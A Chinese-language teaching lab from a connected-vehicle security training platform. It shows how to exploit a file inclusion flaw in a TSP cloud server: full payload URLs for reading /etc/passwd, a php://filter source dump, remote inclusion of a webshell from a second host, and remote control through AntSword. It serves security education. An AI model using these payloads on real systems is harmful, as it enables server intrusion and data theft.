智能網(wǎng)聯(lián)汽車信息安全實(shí)訓(xùn)平臺(tái)的文件包含漏洞實(shí)驗(yàn),測試方案覆蓋車機(jī)軟件、車載通信、車內(nèi)智能終端設(shè)備、車內(nèi)總線等檢測環(huán)境。
通過指導(dǎo)學(xué)生上機(jī)實(shí)踐,讓學(xué)生學(xué)習(xí)利用TSP云平臺(tái)的文件包含漏洞進(jìn)行攻擊的基本原理和操作過程,了解除汽車本身外,TSP平臺(tái)可能存在的安全威脅,并加強(qiáng)安全防護(hù)意識(shí)。
本實(shí)驗(yàn)介紹一種對TSP云平臺(tái)進(jìn)行文件包含漏洞利用的基本過程。利用本地文件包含查看服務(wù)器端的隱私文件,利用遠(yuǎn)程文件包含向服務(wù)器上傳木馬,并使用中國蟻劍連接木馬,從而實(shí)現(xiàn)對服務(wù)器的遠(yuǎn)程控制。
依賴軟件工具:中國蟻劍
一個(gè)網(wǎng)站管理工具,也常用于授權(quán)人員對網(wǎng)站的安全滲透測試。本實(shí)驗(yàn)使用這個(gè)工具連接在遠(yuǎn)程文件包含中植入的網(wǎng)站木馬。
依賴硬件工具
Windows系統(tǒng)PC,Ubuntu系統(tǒng)工控機(jī)。
實(shí)驗(yàn)步驟
實(shí)驗(yàn)流程和網(wǎng)絡(luò)拓?fù)?/p>
1.搜索到TSP云平臺(tái)的文件包含漏洞
打開TSP云平臺(tái)登錄頁面,觀察到URL的參數(shù)filename的值是一個(gè)login.php,是一個(gè)頁面,因此推測該平臺(tái)存在文件包含漏洞。
http://192.168.9.135/include.php?filename=login.php
代碼使用了文件包含函數(shù)
使用以下命令測試,可以確定漏洞確實(shí)存在。
http://192.168.9.135/include.php?filename=/etc/passwd
驗(yàn)證存在文件包含漏洞
2.使用本地文件包含來讀取本地文件隱私數(shù)據(jù)
本實(shí)驗(yàn)在test目錄內(nèi)放了兩個(gè)key.php文件。使用以下命令讀取key1.php,可以得到解析后的內(nèi)容。
http://192.168.9.135/include.php?filename=test/key1.php
可以直接讀取服務(wù)器端的文件內(nèi)容
使用同樣的方法讀取key2.php,發(fā)現(xiàn)不能直接讀取到key信息。
http://192.168.9.135/include.php?filename=test/key2.php
無法看到完整的源代碼
為了獲取到源代碼的內(nèi)容,可以利用php偽協(xié)議,讀取key2.php經(jīng)過base64加密后的數(shù)據(jù)。 http://192.168.9.135/include.php?filename=php://filter/read=convert.base64-encode/resource=test/key2.php
顯示編碼后的php文件源代碼
將base64密文解碼,就可以得到源碼中隱藏的key。
看到解碼后的源碼內(nèi)容
3.使用遠(yuǎn)程文件包含來植入木馬
除了讀取服務(wù)器端的本地文件,還可以利用遠(yuǎn)程文件包含向服務(wù)器上傳木馬,從而控制服務(wù)器。本實(shí)驗(yàn)已經(jīng)在本地部署了一個(gè)apache服務(wù)器,并定義了木馬生成文件 “shell.txt”。
上傳木馬
訪問以下網(wǎng)址來上傳木馬: http://192.168.9.135/include.php?filename=http://10.88.20.117/shell.txt
植入木馬
4.通過菜刀或中國蟻劍來連接木馬,遠(yuǎn)程控制服務(wù)器
打開中國蟻劍,點(diǎn)擊右鍵,選擇 “添加數(shù)據(jù)”,在 “URL地址” 中輸入上一步上傳木馬使用的URL,連接密碼為 “shell”。點(diǎn)擊 “測試連接”,顯示連接成功后,點(diǎn)擊左上角 “添加” 來確認(rèn)添加此連接。
使用中國蟻劍連接木馬
雙擊該連接,可以看到網(wǎng)站后臺(tái)的所有文件,并且可以進(jìn)行新建目錄、上傳文件等操作。
實(shí)現(xiàn)對服務(wù)器的遠(yuǎn)程控制
fqj
評(píng)論
查看更多